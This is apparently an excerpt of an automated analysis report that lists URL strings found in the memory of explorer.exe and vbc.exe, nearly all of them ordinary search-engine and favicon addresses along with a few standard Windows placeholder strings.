Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: vbc.exe, 00000004.00000002.2185288938.00000000020D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2184022473.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: vbc.exe, 00000004.00000002.2187644735.0000000002B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2193363626.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000004.00000002.2185288938.00000000020D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2184022473.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
